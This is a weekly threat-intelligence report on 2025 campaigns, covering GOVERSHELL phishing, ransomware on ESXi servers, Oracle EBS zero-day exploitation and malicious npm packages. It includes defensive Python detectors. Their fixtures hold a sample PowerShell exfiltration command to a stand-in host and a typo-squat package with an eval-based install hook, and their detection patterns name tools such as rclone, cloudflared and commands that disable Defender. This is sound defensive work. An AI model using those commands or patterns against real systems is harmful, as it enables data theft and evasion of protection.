Executive Summary
The cyber threat landscape in 2025 was characterized by complex and sophisticated attacks using various attack vectors and technologies. During this period, numerous cyber threat actors conducted phishing campaigns targeting organizations in North America, Asia, and Europe. They disguised themselves as trustworthy individuals from non-existent organizations and sent phishing emails using various languages and personas. These emails were linked to malicious payloads hosted on cloud services or the attackers' servers. Notably, the malware known as 'GOVERSHELL' maintained remote command execution and persistence through DLL hijacking, and it is suspected that actors with interests related to China developed phishing emails and malware using large language model (LLM) technology.
Additionally, in August 2025, a complex ransomware attack targeted an organization's IT infrastructure, affecting VMware ESXi virtual machines and Windows servers. This attack primarily used ransomware variants such as Warlock, LockBit, and Babuk. The attackers utilized open-source tools like Velociraptor to maintain persistent access and modified Active Directory Group Policy Objects to disable real-time protection features. Specifically, Babuk ransomware was used to perform partial encryption on ESXi servers. These attacks appeared to leverage existing techniques and tools, showing similarities with certain threat groups.
A large-scale vulnerability exploitation campaign targeting Oracle E-Business Suite was also identified. This campaign exploited the CVE-2025-61882 zero-day vulnerability, enabling authentication bypass and remote code execution. The vulnerability allowed attackers to bypass authentication and exploit the Oracle XML Publisher Template Manager feature to upload malicious templates. Oracle disclosed this vulnerability on October 4, 2025, and subsequently, attackers deployed web shells to maintain persistent access. The disclosure of this vulnerability facilitated opportunistic exploitation, and it appears that multiple attackers leveraged it.
Moreover, there were numerous other attacks, including the Akira ransomware campaign targeting SonicWall SSL VPN devices, the Astaroth malware campaign targeting digital banking users, and attacks by emerging threat groups targeting AWS cloud environments. These attacks commonly utilized advanced social engineering techniques, aimed at data theft and financial gain, and employed open-source and commercial tools, complex payload deployments, and various techniques to maintain persistent access. These diverse cyber threat incidents demonstrate how complex and multi-layered the modern cybersecurity environment is. Attackers continue to develop new techniques and tools in line with technological advancements, and organizations must strengthen continuous security monitoring and defense strategies in response. Special attention is required for attack vectors such as phishing, ransomware, and zero-day vulnerability exploitation, and it is crucial to prepare countermeasures against the misuse of new technologies like LLMs.
The "Contagious Interview" campaign by SectorA Group directly targeted developers and the Web3 ecosystem, compromising the trust chain of open-source package registries. Since July 2025, over 338 malicious npm packages have been released, downloaded more than 50,000 times, with some still remaining active. The attackers used typo-squatting packages and obfuscation techniques to create a two-stage compromise chain leading to the BeaverTail loader and InvisibleFerret backdoor. They lured developers with fake recruitment tasks on platforms like LinkedIn, gaining direct access to endpoints and designing the packages to automatically execute malicious payloads upon installation. This behavior indicates that the compromise of individual developer endpoints can immediately translate into a breach of the entire software supply chain's integrity. The attackers operated over 180 fake personas and multiple C2 endpoints, mixing in legitimate hosting to evade detection. Therefore, priority should be given to registry monitoring, package integrity checks, development environment isolation, and strengthening the security of CI/CD pipelines.
Analyzing the cyber-attack events of the SectorB group reveals that this group targets organizations in various regions using sophisticated and multifaceted attack techniques. They primarily select their targets through spear-phishing campaigns, disguising themselves as trustworthy individuals and using the names of non-existent organizations to craft phishing emails in multiple languages. Notably, they employ a "relationship-building phishing" technique to reassure the target after initial contact, engage them in conversation, and then deliver malicious links. These phishing emails typically lead to malicious payloads hosted on cloud services or the attacker's server. The malware used is GOVERSHELL, distributed by including a seemingly legitimate executable file within ZIP or RAR compressed files, and executed through DLL hijacking techniques. GOVERSHELL utilizes scheduled tasks for remote command execution and maintaining persistence, and has evolved into five variants. Based on technical indicators and campaign characteristics, it appears that this group has utilized large language models (LLMs) for crafting phishing emails and developing malware. The illogical content and abnormal details of the emails support this.
Additionally, in August 2025, they targeted the IT infrastructure of specific organizations through a complex ransomware attack, deploying various ransomware variants such as Warlock, LockBit, and Babuk. This attack primarily affected VMware ESXi virtual machines and Windows servers, using the open-source tool Velociraptor to maintain persistent access. By exploiting privilege escalation vulnerabilities in older versions of Velociraptor, they executed commands and potentially created communication tunnels. Fileless PowerShell scripts were used to perform mass encryption on Windows systems, and Active Directory Group Policy Objects were modified to disable real-time protection features. Babuk ransomware was used for partial encryption on ESXi servers. PowerShell scripts were used for data exfiltration, with $ProgressPreference set to 'SilentlyContinue' to avoid detection. These attack techniques bear similarities to the tactics of previously known specific threat groups, suggesting a moderate level of relatedness. The attack activities of the SectorB group are characterized by a high level of sophistication in TTPs (tactics, techniques, and procedures) and reflect the latest technological trends.
The espionage operation targeting the Middle East conducted by SectorD Group is noteworthy as a case combining technical proficiency and strategic objectives. This operation aimed for long-term persistence and large-scale information gathering by incorporating the exploitation of CVE-2024-1709, DNS manipulation of routers, custom remote access tools, EDR evasion, supply chain pivoting, and complex phishing infrastructure. Leaked internal documents (in Persian) detail the organizational structure and operational techniques, demonstrating the sophistication of the operation, with targets spanning national and social infrastructure, including government, legal, academic, aviation, energy, and finance sectors. This case highlights the need for policy and governance responses beyond simple technical defenses, such as verifying infrastructure integrity, checking the configuration of network boundary devices, continuous monitoring of router and DNS settings, and evaluating supply chain reliability. Additionally, due to the nature of espionage-type attacks, a comprehensive incident response plan, including diplomatic and legal responses, should be implemented concurrently.
Examining recent cyber-attack cases by the SectorJ group reveals that they primarily achieve their objectives through advanced techniques and various tactics, techniques, and procedures (TTPs). In the first case, they targeted data exfiltration by exploiting a new zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite. This attack involved bypassing authentication via an unauthenticated remote code execution vulnerability using HTTP POST requests, uploading a malicious template, and executing code through Oracle's XML Publisher Template Manager. A notable feature is the deployment of a web shell to maintain persistent access, with a PoC exploit circulated on Telegram suggesting the involvement of multiple threat actors. The second case involved a phishing campaign targeting Germany, where a malicious SVG file was used to download a reverse shell malware called StarFish, securing persistent access and distributing additional payloads. This attack increased email credibility by reusing stolen legitimate emails to pass SPF checks. StarFish set up persistent registry access and deployed a credential-stealing malware called Strela Stealer, showcasing technological advancement beyond simple credential theft. In the third case, an attack exploiting a critical deserialization vulnerability (CVE-2025-10035) in GoAnywhere MFT was observed. This vulnerability allows arbitrary deserialization through a forged license response signature, leading to command injection and remote code execution. A cybercrime group known for Medusa ransomware exploited this vulnerability, posing a significant threat to internet-exposed instances as the attack can occur without authentication. The attackers used RMM tools like SimpleHelp and MeshAgent to maintain persistence and established secure C2 communication via Cloudflare tunnels. During the data exfiltration phase, Rclone was used, and Medusa ransomware was deployed in at least one environment. These multi-stage tactics demonstrate an approach involving zero-day vulnerability exploitation, persistence through RMM tools, and attack expansion through system discovery and lateral movement. The hacking activities of the SectorJ group illustrate their sophistication through continuous vulnerability exploration, rapid malware deployment, and diverse approaches.
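The SectorB and SectorJ descriptions above name a handful of host-level behaviours that leave traces in PowerShell script-block logs: real-time protection switched off through policy, $ProgressPreference silenced next to an upload, and rclone or cloudflared launched from a script. The Python below is an added example, not code from this report or from any of the tools it names. It runs a few assumed detection rules over constructed log records (the field names, host names, rule patterns and severity thresholds are all assumptions) and shows how the combination of indicators, rather than any single one, drives the severity.

```python
"""Score PowerShell script-block log records for the behaviours described above."""
import re
from dataclasses import dataclass

# Assumed detection rules: (rule id, pattern, what a hit indicates).
RULES = [
    ("rtp_tamper",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$?true"
                r"|DisableRealtimeMonitoring\b.*\b1\b", re.I),
     "real-time protection disabled via cmdlet or policy registry value"),
    ("quiet_progress",
     re.compile(r"\$ProgressPreference\s*=\s*['\"]SilentlyContinue['\"]", re.I),
     "progress output suppressed"),
    ("web_upload",
     re.compile(r"Invoke-(WebRequest|RestMethod)\b.*-Method\s+(Put|Post)\b|-InFile\b", re.I),
     "HTTP upload from PowerShell"),
    ("rclone", re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I), "rclone transfer"),
    ("cloudflared", re.compile(r"\bcloudflared(\.exe)?\s+tunnel\b", re.I), "cloudflared tunnel"),
    ("fileless", re.compile(r"\bIEX\b|Invoke-Expression|-EncodedCommand\b|\s-e(nc?)?\s", re.I),
     "in-memory execution"),
]

# Indicator pairs that together read as scripted exfiltration (assumed policy).
EXFIL_COMBOS = [frozenset({"quiet_progress", "web_upload"}),
                frozenset({"quiet_progress", "rclone"})]


@dataclass
class Finding:
    host: str
    user: str
    rules: list
    severity: str


def score_block(script: str):
    """Return (rule ids that matched, severity) for one script block."""
    hits = [rid for rid, rx, _ in RULES if rx.search(script)]
    if not hits:
        return hits, "none"
    # Tampering with protection, or a silenced upload, is high on its own.
    if "rtp_tamper" in hits or any(c <= set(hits) for c in EXFIL_COMBOS):
        return hits, "high"
    return hits, "medium" if len(hits) > 1 else "low"


def hunt(records):
    """Produce one Finding per record that matched at least one rule."""
    findings = []
    for rec in records:
        hits, sev = score_block(rec["ScriptBlockText"])
        if hits:
            findings.append(Finding(rec["Computer"], rec["User"], hits, sev))
    return findings


# Constructed sample records, loosely modelled on script-block logging events.
SAMPLE_EVENTS = [
    {"Computer": "SRV-FILE01", "User": "CORP\\svc-backup",
     "ScriptBlockText": "$ProgressPreference = 'SilentlyContinue'; "
                        "Compress-Archive -Path C:\\Shares\\HR -DestinationPath $env:TEMP\\hr.zip; "
                        "Invoke-WebRequest -Uri https://drop.example.invalid/up -Method Put "
                        "-InFile $env:TEMP\\hr.zip"},
    {"Computer": "DC01", "User": "CORP\\admin",
     "ScriptBlockText": "Set-ItemProperty 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
                        "\\Real-Time Protection' -Name DisableRealtimeMonitoring -Value 1"},
    {"Computer": "WS-042", "User": "CORP\\jdoe",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"},
    {"Computer": "SRV-APP03", "User": "NT AUTHORITY\\SYSTEM",
     "ScriptBlockText": "cloudflared.exe tunnel run --token TOKEN_PLACEHOLDER"},
    {"Computer": "SRV-BACKUP", "User": "CORP\\svc-backup",
     "ScriptBlockText": "rclone.exe copy D:\\Backups remote:bucket --transfers 8"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.host:12} {f.user:20} {', '.join(f.rules)}")
```

The low-severity hits (a lone cloudflared or rclone launch) are deliberately kept: on a backup server rclone may be legitimate, so the rule set raises severity only when the tool appears together with the silenced progress stream the report describes, while the Defender policy change is high by itself.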
Key Characteristics of This Week's Cyber Threats
Recent cyber-attacks have utilized a wide variety of malware and attack vectors, showing a trend of combining multiple attack techniques. Notably, the malware used in these incidents includes GOVERSHELL, Babuk ransomware, Chaos-C++, Astaroth, AdaptixC2, and Shuyal Stealer. Each of these malware families has its own characteristics and infiltrates victims' systems in various ways to steal information.
GOVERSHELL is distributed through spear phishing and executes malware using DLL hijacking techniques via seemingly legitimate executable files hidden in ZIP or RAR files. This malware maintains persistence by utilizing scheduled tasks and enables remote command execution. It is suspected to be linked to threat actors associated with China and appears to have used large language models (LLMs) to craft phishing emails and malware.
Babuk ransomware primarily targets VMware ESXi virtual machines and Windows servers, maintaining persistent access through an open-source tool called Velociraptor. It attempts privilege escalation by exploiting vulnerabilities in Velociraptor and performs mass encryption on Windows systems using PowerShell scripts.
Chaos-C++ is ransomware redeveloped from a previous .NET version to C++, targeting Microsoft Windows systems. This ransomware hijacks the clipboard to intercept cryptocurrency transactions in addition to its encryption and deployment routines. Additionally, Chaos-C++ makes recovery difficult by deleting large files.
Astaroth targets digital banking users in South America, particularly Brazil, and is distributed via phishing emails. This malware uses GitHub as a hosting platform for its configuration files and updates its command and control (C2) configuration using steganography.
AdaptixC2 is a modular open-source C2 framework that supports command execution, file transfer, process injection, and information gathering. This framework primarily uses HTTP and HTTPS for communication and enables lateral movement using SMB and TCP.
Shuyal Stealer targets 19 web browsers to steal sensitive data and uses PowerShell scripts to evade system detection. This malware transmits data via Telegram bots and deletes evidence to make detection difficult.
Attack vectors included spear phishing, vulnerability exploitation, malicious email attachments, web shell deployment, and authentication bypass. Notably, the CVE-2025-61882 vulnerability in Oracle E-Business Suite was exploited in a multi-stage attack chain to bypass authentication and execute code, leading to data theft and system compromise. Additionally, attacks targeting SonicWall SSL VPN devices leveraged public vulnerabilities and misconfigurations to gain initial access and deploy ransomware.
These attacks demonstrated attempts to bypass defense systems by mixing various attack techniques and technologies. By using different malware and attack vectors, they complicate detection and defense, particularly by combining phishing techniques and social engineering to easily deceive users. These attacks highlight the need for organizations to strengthen their security systems and respond through continuous monitoring and updates.
Key Takeaways from This Week's Cyber Threat Landscape
The key trends in threats observed this week include AI-based automation, the commercial proliferation of zero-day exploits, and the spread of multi-layered infiltration structures due to the misuse of legitimate tools. As seen in the GOVERSHELL campaign, the sophistication of social engineering has significantly improved by using large language models (LLMs) to automatically generate multilingual phishing messages and lures. This use of AI contributes to the naturalness of phishing content and the creation of customized personas, designed to evade traditional rule-based detection. Therefore, phishing defenses need to shift from static signature detection to behavior-based and context analysis-focused approaches.
Simultaneously, as seen in the case of CVE-2025-61882 in Oracle E-Business Suite, zero-day vulnerabilities are being widely exploited in a short period by various threat groups, and the trend of 'Exploit-as-a-Service' is strengthening. Attackers exploited the XML Publisher Template Manager to upload malicious templates, deploy web shells, and construct a consistent attack chain leading to data theft and extortion. This incident suggests that rapid threat intelligence sharing, patch management, and automated monitoring of core application layers are essential in response to zero-day threats.
Attacks targeting cloud and virtualization environments continue to emerge, demonstrating that attackers are actively utilizing legitimate management and operational tools for persistence after infiltration. Examples include the exploitation of vulnerabilities in older versions of Velociraptor (CVE-2025-6264), theft of AWS IAM keys and abuse of excessive permissions, and partial encryption targeting ESXi environments. Attackers make detection difficult by converting legitimate services and tools like Rclone, AnyDesk, and Cloudflare Tunnel into C2, data exfiltration, and lateral movement paths. Consequently, cloud security should be operated not as simple perimeter defense but as a combination of privilege minimization, key and credential lifecycle management, and abnormal behavior detection.
The ransomware ecosystem is undergoing modularization, variant diversification, and franchising, with various variants such as Chaos-C++, Warlock, LockBit, Babuk, and Direwolf consistently employing double extortion tactics. Some variants have increased recovery difficulty by switching programming languages (e.g., .NET → C++) or introducing unique encryption and file handling logic. Operators attempt prolonged internal occupation after initial access using legitimate tools.
Concurrently, the misuse of public package repositories like npm, PyPI, and RubyGems, and the use of legitimate platforms like Discord, Telegram, and GitHub for C2 and data exfiltration techniques directly threaten the supply chain and developer trust chain. Therefore, software supply chain security should be strengthened through developer education, package integrity verification, registry monitoring, and external dependency inspection systems.
Phishing and social engineering have become more sophisticated with trust-building techniques using realistic UIs, such as brand impersonation, disguising as recruitment processes, and mimicking CAPTCHA and Glassdoor pages. Additionally, there are attempts to evade detection using unconventional file formats like SVG, LNK, and ZIP. Information-stealing malware (such as Shuyal, Stealit, Astaroth, etc.) comprehensively collects browser data, clipboard contents, screenshots, and cryptocurrency wallet information, operating automated exfiltration pipelines through Telegram, Discord, and GitHub. As a result, the likelihood of forensic trace deletion, evidence concealment, and reinfection has increased, necessitating a redesign of detection and response strategies to focus on more in-depth log collection and correlation analysis.
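The npm campaign in the executive summary and the supply-chain takeaways above come down to two checkable properties of a package: whether it runs code at install time, and whether its name sits an edit or two away from a package the developer actually meant to install. The Python below is an added example, not the report's code or any registry's tooling. It inspects constructed package.json manifests against a constructed allowlist of trusted names, using Levenshtein distance for the typo-squat check and a small regex for install hooks that decode or fetch code; the allowlist, thresholds and the "block/review/ok" policy are assumptions.

```python
"""Flag npm manifests that run code on install or typo-squat a trusted name."""
import json
import re

# Constructed allowlist of package names a team expects to depend on.
TRUSTED = {"lodash", "express", "react", "axios", "chalk"}
# npm lifecycle hooks that execute automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Rough markers of a hook that decodes or fetches code instead of building.
SUSPICIOUS_CMD = re.compile(
    r"\b(eval|Function)\s*\(|base64|child_process|\bnode\s+-e\b|\bcurl\b|\bwget\b", re.I)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the classic row-by-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def closest_trusted(name: str):
    """Return (trusted_name, distance) for the nearest allowlisted package."""
    if not name:
        return None, None
    return min(((t, edit_distance(name, t)) for t in TRUSTED), key=lambda p: p[1])


def assess_manifest(text: str) -> dict:
    """Assess one package.json document and return name, risk and reasons."""
    pkg = json.loads(text)
    name = pkg.get("name", "")
    scripts = pkg.get("scripts") or {}
    reasons = []
    hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
    if hooks:
        reasons.append("runs code on install: " + ", ".join(hooks))
    for hook, cmd in hooks.items():
        if SUSPICIOUS_CMD.search(cmd):
            reasons.append(f"{hook} decodes or fetches code")
    near, dist = closest_trusted(name)
    if near and name not in TRUSTED and dist <= 2:
        reasons.append(f"name is {dist} edit(s) from trusted '{near}'")
    # Assumed policy: two independent signals block, one asks for review.
    risk = "block" if len(reasons) >= 2 else ("review" if reasons else "ok")
    return {"name": name, "risk": risk, "reasons": reasons}


# Constructed manifests; the base64 blob is a placeholder, not a real payload.
SAMPLE_MANIFESTS = {
    "typosquat": json.dumps({"name": "lodahs", "version": "4.17.21", "scripts": {
        "postinstall": "node -e \"eval(Buffer.from('Li4u','base64').toString())\""}}),
    "clean": json.dumps({"name": "express-helper-utils", "version": "1.0.0"}),
    "trusted_with_hook": json.dumps({"name": "axios", "version": "1.7.0", "scripts": {
        "postinstall": "node scripts/build.js"}}),
}


def scan_all(manifests=SAMPLE_MANIFESTS) -> dict:
    """Assess every manifest and key the results by their label."""
    return {label: assess_manifest(text) for label, text in manifests.items()}


if __name__ == "__main__":
    for label, result in scan_all().items():
        print(f"{label:18} {result['risk']:6} {result['name']:22} {'; '.join(result['reasons'])}")
```

Setting `ignore-scripts=true` in `.npmrc` (an existing npm configuration key) stops lifecycle scripts from running during installation, which removes the auto-execution step the campaign relied on; a scan like the one above then tells you which packages would have needed that step in the first place and deserve a closer look before they are allowed back in.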
In summary, this week's threats indicate that technical sophistication and automation are advancing simultaneously, accelerating the industrialization of the attacker ecosystem. From a defense perspective, it is urgent to secure capabilities for detecting LLM abuse, automate monitoring of zero-day and exploit distribution, ensure thorough cloud IAM and key management, strengthen software supply chain integrity policies, and introduce AI and behavior-based phishing detection models. Beyond short-term event responses, there is a need for a shift towards organizational-level security governance, integration of threat intelligence, and a proactive detection and behavior analysis system.